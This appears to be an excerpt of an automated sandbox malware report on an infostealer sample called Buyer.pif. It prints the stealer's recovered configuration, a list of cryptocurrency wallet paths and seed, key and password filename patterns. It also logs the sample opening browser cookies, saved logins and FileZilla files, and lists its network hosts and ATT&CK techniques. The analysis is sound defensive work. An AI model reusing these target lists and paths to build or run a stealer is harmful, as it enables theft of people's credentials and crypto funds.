                    Source: Buyer.pif, 0000000B.00000002.2536265595.0000000001060000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                    Source: Buyer.pif, 0000000B.00000002.2536265595.0000000001060000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                    Source: Buyer.pif, 0000000B.00000002.2537444550.0000000003C57000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Flash|%DRIVE_REMOVABLE%\|*wallet*.*,*seed*.*,*btc*.*,*key*.*,*2fa*.*,*crypto*.*,*coin*.*,*private*.*,*2fa*.*,*auth*.*,*ledger*.*,*trezor*.*,*pass*.*,*wal*.*,*upbit*.*,*bcex*.*,*bithimb*.*,*hitbtc*.*,*bitflyer*.*,*kucoin*.*,*huobi*.*,*poloniex*.*,*kraken*.*,*okex*.*,*binance*.*,*bitfinex*.*,*gdax*.*,*ethereum*.*,*exodus*.*,*metamask*.*,*myetherwallet*.*,*electrum*.*,*bitcoin*.*,*blockchain*.*,*coinomi*.*,*words*.*,*meta*.*,*mask*.*,*eth*.*,*recovery*.*|150|3|*windows*,*Program Files*,*Program Files (x86)*,*AppData*,*ProgramData*,*.lnk,*.exe,*.scr,*.com,*.pif,*.mp3|DESKTOP|%DESKTOP%\|*wallet*.*,*seed*.*,*btc*.*,*key*.*,*2fa*.*,*crypto*.*,*coin*.*,*private*.*,*2fa*.*,*auth*.*,*ledger*.*,*trezor*.*,*pass*.*,*wal*.*,*upbit*.*,*bcex*.*,*bithimb*.*,*hitbtc*.*,*bitflyer*.*,*kucoin*.*,*huobi*.*,*poloniex*.*,*kraken*.*,*okex*.*,*binance*.*,*bitfinex*.*,*gdax*.*,*ethereum*.*,*exodus*.*,*metamask*.*,*myetherwallet*.*,*electrum*.*,*bitcoin*.*,*blockchain*.*,*coinomi*.*,*words*.*,*meta*.*,*mask*.*,*eth*.*,*recovery*.*|150|2|*Windows*,*Program Files*,*Program Files (x86)*,*AppData*,*ProgramData*,*.lnk,*.exe,*.scr,*.com,*.pif,*.mp3|
                    Source: Buyer.pif, 0000000B.00000002.2537444550.0000000003C57000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Flash|%DRIVE_REMOVABLE%\|*wallet*.*,*seed*.*,*btc*.*,*key*.*,*2fa*.*,*crypto*.*,*coin*.*,*private*.*,*2fa*.*,*auth*.*,*ledger*.*,*trezor*.*,*pass*.*,*wal*.*,*upbit*.*,*bcex*.*,*bithimb*.*,*hitbtc*.*,*bitflyer*.*,*kucoin*.*,*huobi*.*,*poloniex*.*,*kraken*.*,*okex*.*,*binance*.*,*bitfinex*.*,*gdax*.*,*ethereum*.*,*exodus*.*,*metamask*.*,*myetherwallet*.*,*electrum*.*,*bitcoin*.*,*blockchain*.*,*coinomi*.*,*words*.*,*meta*.*,*mask*.*,*eth*.*,*recovery*.*|150|3|*windows*,*Program Files*,*Program Files (x86)*,*AppData*,*ProgramData*,*.lnk,*.exe,*.scr,*.com,*.pif,*.mp3|DESKTOP|%DESKTOP%\|*wallet*.*,*seed*.*,*btc*.*,*key*.*,*2fa*.*,*crypto*.*,*coin*.*,*private*.*,*2fa*.*,*auth*.*,*ledger*.*,*trezor*.*,*pass*.*,*wal*.*,*upbit*.*,*bcex*.*,*bithimb*.*,*hitbtc*.*,*bitflyer*.*,*kucoin*.*,*huobi*.*,*poloniex*.*,*kraken*.*,*okex*.*,*binance*.*,*bitfinex*.*,*gdax*.*,*ethereum*.*,*exodus*.*,*metamask*.*,*myetherwallet*.*,*electrum*.*,*bitcoin*.*,*blockchain*.*,*coinomi*.*,*words*.*,*meta*.*,*mask*.*,*eth*.*,*recovery*.*|150|2|*Windows*,*Program Files*,*Program Files (x86)*,*AppData*,*ProgramData*,*.lnk,*.exe,*.scr,*.com,*.pif,*.mp3|
                    Source: Buyer.pif, 0000000B.00000002.2536265595.0000000001060000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                    Source: Buyer.pif, 0000000B.00000002.2536265595.0000000001060000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                    Source: C:\Users\user\AppData\Local\Temp\447331\Buyer.pif File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite
                    Source: C:\Users\user\AppData\Local\Temp\447331\Buyer.pif File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
                    Source: C:\Users\user\AppData\Local\Temp\447331\Buyer.pif File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite
                    Source: C:\Users\user\AppData\Local\Temp\447331\Buyer.pif File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\prefs.js
                    Source: C:\Users\user\AppData\Local\Temp\447331\Buyer.pif File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
                    Source: C:\Users\user\AppData\Local\Temp\447331\Buyer.pif File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                    Source: C:\Users\user\AppData\Local\Temp\447331\Buyer.pif File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                    Source: C:\Users\user\AppData\Local\Temp\447331\Buyer.pif File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                    Source: C:\Users\user\AppData\Local\Temp\447331\Buyer.pif File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                    Source: C:\Users\user\AppData\Local\Temp\447331\Buyer.pif File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
                    Source: C:\Users\user\AppData\Local\Temp\447331\Buyer.pif File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml
                    Source: C:\Users\user\AppData\Local\Temp\447331\Buyer.pif File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\
                    Source: C:\Users\user\AppData\Local\Temp\447331\Buyer.pif File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
                    Source: C:\Users\user\AppData\Local\Temp\447331\Buyer.pif File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\
                    Source: C:\Users\user\AppData\Local\Temp\447331\Buyer.pif File opened: C:\Users\user\AppData\Roaming\Exodus\
                    Source: C:\Users\user\AppData\Local\Temp\447331\Buyer.pif File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
                    Source: C:\Users\user\AppData\Local\Temp\447331\Buyer.pif File opened: C:\Users\user\AppData\Roaming\Exodus\backups\
                    Source: C:\Users\user\AppData\Local\Temp\447331\Buyer.pif File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\
                    Source: C:\Users\user\AppData\Local\Temp\447331\Buyer.pif File opened: C:\Users\user\AppData\Roaming\MultiDoge\
                    Source: C:\Users\user\AppData\Local\Temp\447331\Buyer.pif File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\
                    Source: C:\Users\user\AppData\Local\Temp\447331\Buyer.pif File opened: C:\Users\user\AppData\Roaming\Binance\
                    Source: C:\Users\user\AppData\Local\Temp\447331\Buyer.pif File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\
                    Source: C:\Users\user\AppData\Local\Temp\447331\Buyer.pif File opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\
                    Source: C:\Users\user\AppData\Local\Temp\447331\Buyer.pif File opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\
                    Source: C:\Users\user\AppData\Local\Temp\447331\Buyer.pif File opened: C:\Users\user\AppData\Roaming\Ledger Live\
                    Source: C:\Users\user\AppData\Local\Temp\447331\Buyer.pif File opened: C:\Users\user\AppData\Roaming\atomic_qt\config\
                    Source: C:\Users\user\AppData\Local\Temp\447331\Buyer.pif File opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\
                    Source: C:\Users\user\AppData\Local\Temp\447331\Buyer.pif File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\
                    Source: C:\Users\user\AppData\Local\Temp\447331\Buyer.pif File opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\
                    Source: Buyer.pif Binary or memory string: WIN_81
                    Source: Buyer.pif Binary or memory string: WIN_XP
                    Source: Buyer.pif Binary or memory string: WIN_XPe
                    Source: Buyer.pif Binary or memory string: WIN_VISTA
                    Source: Buyer.pif Binary or memory string: WIN_7
                    Source: Buyer.pif Binary or memory string: WIN_8
                    Source: Yara match File source: Process Memory Space: Buyer.pif PID: 2380, type: MEMORYSTR

                    Remote Access Functionality

                    Source: Yara match File source: sslproxydump.pcap, type: PCAP
                    Source: Yara match File source: 11.2.Buyer.pif.1354718.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara match File source: 11.2.Buyer.pif.1354718.1.unpack, type: UNPACKEDPE
                    Source: Yara match File source: 11.2.Buyer.pif.40f0000.6.unpack, type: UNPACKEDPE
                    Source: Yara match File source: 0000000B.00000003.2130645867.0000000003C4B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match File source: 0000000B.00000002.2536816271.0000000001347000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match File source: 0000000B.00000002.2537199925.0000000003A7A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match File source: 0000000B.00000002.2536907553.00000000013D9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match File source: 0000000B.00000003.2130822576.00000000040FC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match File source: 0000000B.00000003.2130701171.00000000039F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match File source: 0000000B.00000002.2537708757.00000000040F1000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match File source: Process Memory Space: Buyer.pif PID: 2380, type: MEMORYSTR
                    Source: C:\Users\user\AppData\Local\Temp\447331\Buyer.pif Code function: 11_2_00FC198B socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket, 11_2_00FC198B
                    Source: C:\Users\user\AppData\Local\Temp\447331\Buyer.pif Code function: 11_2_00FC1F8D socket,WSAGetLastError,bind,WSAGetLastError,closesocket, 11_2_00FC1F8D
                    Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
                    Gather Victim Identity Information | Acquire Infrastructure | 2 Valid Accounts | 11 Windows Management Instrumentation | 1 DLL Side-Loading | 1 Exploitation for Privilege Escalation | 11 Disable or Modify Tools | 2 OS Credential Dumping | 2 System Time Discovery | Remote Services | 1 Archive Collected Data | 2 Ingress Tool Transfer | Exfiltration Over Other Network Medium | 1 System Shutdown/Reboot
                    Credentials | Domains | Default Accounts | 1 Native API | 2 Valid Accounts | 1 DLL Side-Loading | 1 Deobfuscate/Decode Files or Information | 21 Input Capture | 1 Account Discovery | Remote Desktop Protocol | 4 Data from Local System | 11 Encrypted Channel | Exfiltration Over Bluetooth | Network Denial of Service
                    Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | 2 Valid Accounts | 2 Obfuscated Files or Information | Security Account Manager | 3 File and Directory Discovery | SMB/Windows Admin Shares | 21 Input Capture | 3 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
                    Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | 21 Access Token Manipulation | 1 DLL Side-Loading | NTDS | 27 System Information Discovery | Distributed Component Object Model | 3 Clipboard Data | 114 Application Layer Protocol | Traffic Duplication | Data Destruction
                    Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | 12 Process Injection | 111 Masquerading | LSA Secrets | 1 Query Registry | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
                    Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 2 Valid Accounts | Cached Domain Credentials | 141 Security Software Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
                    DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 11 Virtualization/Sandbox Evasion | DCSync | 11 Virtualization/Sandbox Evasion | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
                    Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 21 Access Token Manipulation | Proc Filesystem | 4 Process Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
                    Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 12 Process Injection | /etc/passwd and /etc/shadow | 1 Application Window Discovery | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement
                    IP Addresses | Compromise Infrastructure | Supply Chain Compromise | PowerShell | Cron | Cron | Dynamic API Resolution | Network Sniffing | 1 System Owner/User Discovery | Shared Webroot | Local Data Staging | File Transfer Protocols | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | External Defacement
                    [Behavior graph not reproduced. Behavior Graph ID: 1483190; Sample: file.exe; Startdate: 26/07/2024; Architecture: WINDOWS; Score: 100]

                    No Antivirus matches
                    Source | Detection | Scanner | Label | Link
                    C:\ProgramData\freebl3.dll | 0% | ReversingLabs | |
                    C:\ProgramData\mozglue.dll | 0% | ReversingLabs | |
                    C:\ProgramData\msvcp140.dll | 0% | ReversingLabs | |
                    C:\ProgramData\nss3.dll | 0% | ReversingLabs | |
                    C:\ProgramData\softokn3.dll | 0% | ReversingLabs | |
                    C:\ProgramData\vcruntime140.dll | 0% | ReversingLabs | |
                    C:\Users\user\AppData\Local\Temp\447331\Buyer.pif | 0% | ReversingLabs | |
                    No Antivirus matches
                    No Antivirus matches
                    Source | Detection | Scanner | Label | Link
Name | IP | Active | Malicious | Antivirus Detection | Reputation
steamcommunity.com | 23.192.247.89 | true | true | | unknown
arpdabl.zapto.org | 77.91.101.71 | true | false | | unknown
BOAbiVqkIfMQExjauBCLW.BOAbiVqkIfMQExjauBCLW | unknown | unknown | false | | unknown
Name | Malicious | Antivirus Detection | Reputation
Name | Source | Malicious | Antivirus Detection | Reputation
                          • Avira URL Cloud: safe
                          unknown
                          https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696425136400800000.1&ci=1696425136743.12791&ctaBuyer.pif, 0000000B.00000002.2537444550.0000000003C9D000.00000004.00000800.00020000.00000000.sdmp, Buyer.pif, 0000000B.00000002.2537288902.0000000003B16000.00000004.00000800.00020000.00000000.sdmp, BKFCAF.11.drfalse
                          • URL Reputation: safe
                          unknown
                          https://community.akamai.steamstatic.com/public/images/skin_1/arrowDn9x5.gifBuyer.pif, 0000000B.00000002.2537444550.0000000003C4A000.00000004.00000800.00020000.00000000.sdmp, Buyer.pif, 0000000B.00000002.2537708757.0000000004128000.00000040.00001000.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drfalse
                          • Avira URL Cloud: safe
                          unknown
                          https://community.akamai.steamstatic.com/public/css/skin_1/modalContent.css?v=.TP5s6TzX6LLhBuyer.pif, 0000000B.00000002.2537708757.0000000004128000.00000040.00001000.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drfalse
                          • Avira URL Cloud: safe
                          unknown
                          https://ac.ecosia.org/autocomplete?q=HDGCAA.11.drfalse
                          • URL Reputation: safe
                          unknown
                          https://community.akamai.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016Buyer.pif, 0000000B.00000002.2537444550.0000000003C4A000.00000004.00000800.00020000.00000000.sdmp, Buyer.pif, 0000000B.00000002.2537708757.0000000004128000.00000040.00001000.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drfalse
                          • Avira URL Cloud: safe
                          unknown
                          https://contile-images.services.mozilla.com/u1AuJcj32cbVUf9NjMipLXEYwu2uFIt4lsj-ccwVqEs.36904.jpgBuyer.pif, 0000000B.00000002.2537444550.0000000003C9D000.00000004.00000800.00020000.00000000.sdmp, Buyer.pif, 0000000B.00000002.2537288902.0000000003B16000.00000004.00000800.00020000.00000000.sdmp, BKFCAF.11.drfalse
                          • URL Reputation: safe
                          unknown
                          https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpgBuyer.pif, 0000000B.00000002.2537444550.0000000003C9D000.00000004.00000800.00020000.00000000.sdmp, Buyer.pif, 0000000B.00000002.2537288902.0000000003B16000.00000004.00000800.00020000.00000000.sdmp, BKFCAF.11.drfalse
                          • URL Reputation: safe
                          unknown
                          • No. of IPs < 25%
                          • 25% < No. of IPs < 50%
                          • 50% < No. of IPs < 75%
                          • 75% < No. of IPs
                          IP | Domain | Country | ASN | ASN Name | Malicious
                          77.91.101.71 | arpdabl.zapto.org | Russian Federation | 42861 | FOTONTELECOM-TRANSIT-ASFOTONTELECOMISPRU | false
                          5.75.212.60 | unknown | Germany | 24940 | HETZNER-ASDE | false
                          23.192.247.89 | steamcommunity.com | United States | 16625 | AKAMAI-ASUS | true
                          Joe Sandbox version:40.0.0 Tourmaline
                          Analysis ID:1483190
                          Start date and time:2024-07-26 19:57:07 +02:00
                          Joe Sandbox product:CloudBasic
                          Overall analysis duration:0h 8m 3s
                          Hypervisor based Inspection enabled:false
                          Report type:full
                          Cookbook file name:default.jbs
                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                          Number of analysed new started processes analysed:19
                          Number of new started drivers analysed:0
                          Number of existing processes analysed:0
                          Number of existing drivers analysed:0
                          Number of injected processes analysed:0
                          Technologies:
                          • HCA enabled
                          • EGA enabled
                          • AMSI enabled
                          Analysis Mode:default
                          Analysis stop reason:Timeout
                          Sample name:file.exe
                          Detection:MAL
                          Classification:mal100.troj.spyw.evad.winEXE@26/54@3/3
                          EGA Information:
                          • Successful, ratio: 100%
                          HCA Information:
                          • Successful, ratio: 100%
                          • Number of executed functions: 79
                          • Number of non-executed functions: 285
                          Cookbook Comments:
                          • Found application associated with file extension: .exe
                          • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                          • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                          • Not all processes where analyzed, report is missing behavior information
                          • Report size exceeded maximum capacity and may have missing behavior information.
                          • Report size exceeded maximum capacity and may have missing disassembly code.
                          • Report size getting too big, too many NtOpenFile calls found.
                          • Report size getting too big, too many NtOpenKeyEx calls found.
                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                          • Report size getting too big, too many NtQueryAttributesFile calls found.
                          • Report size getting too big, too many NtQueryValueKey calls found.
                          • Report size getting too big, too many NtSetInformationFile calls found.
                          • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                          • VT rate limit hit for: file.exe
                          Time | Type | Description
                          13:57:56 | API Interceptor | 1x Sleep call for process: file.exe modified
                          13:57:58 | API Interceptor | 1x Sleep call for process: Buyer.pif modified
                                                                                                  Process:C:\Users\user\AppData\Local\Temp\447331\Buyer.pif
                                                                                                  File Type:SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2
                                                                                                  Category:dropped
                                                                                                  Size (bytes):5242880
                                                                                                  Entropy (8bit):0.03859996294213402
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:192:58rJQaXoMXp0VW9FxWHxDSjENbx56p3DisuwAyHI:58r54w0VW3xWdkEFxcp3y/y
                                                                                                  MD5:D2A38A463B7925FE3ABE31ECCCE66ACA
                                                                                                  SHA1:A1824888F9E086439B287DEA497F660F3AA4B397
                                                                                                  SHA-256:474361353F00E89A9ECB246EC4662682392EBAF4F2A4BE9ABB68BBEBE33FA4A0
                                                                                                  SHA-512:62DB46A530D952568EFBFF7796106E860D07754530B724E0392862EF76FDF99043DA9538EC0044323C814DF59802C3BB55454D591362CB9B6E39947D11E981F7
                                                                                                  Malicious:false
                                                                                                  Process:C:\Users\user\AppData\Local\Temp\447331\Buyer.pif
                                                                                                  File Type:data
                                                                                                  Category:dropped
                                                                                                  Size (bytes):32768
                                                                                                  Entropy (8bit):0.017262956703125623
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
                                                                                                  MD5:B7C14EC6110FA820CA6B65F5AEC85911
                                                                                                  SHA1:608EEB7488042453C9CA40F7E1398FC1A270F3F4
                                                                                                  SHA-256:FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
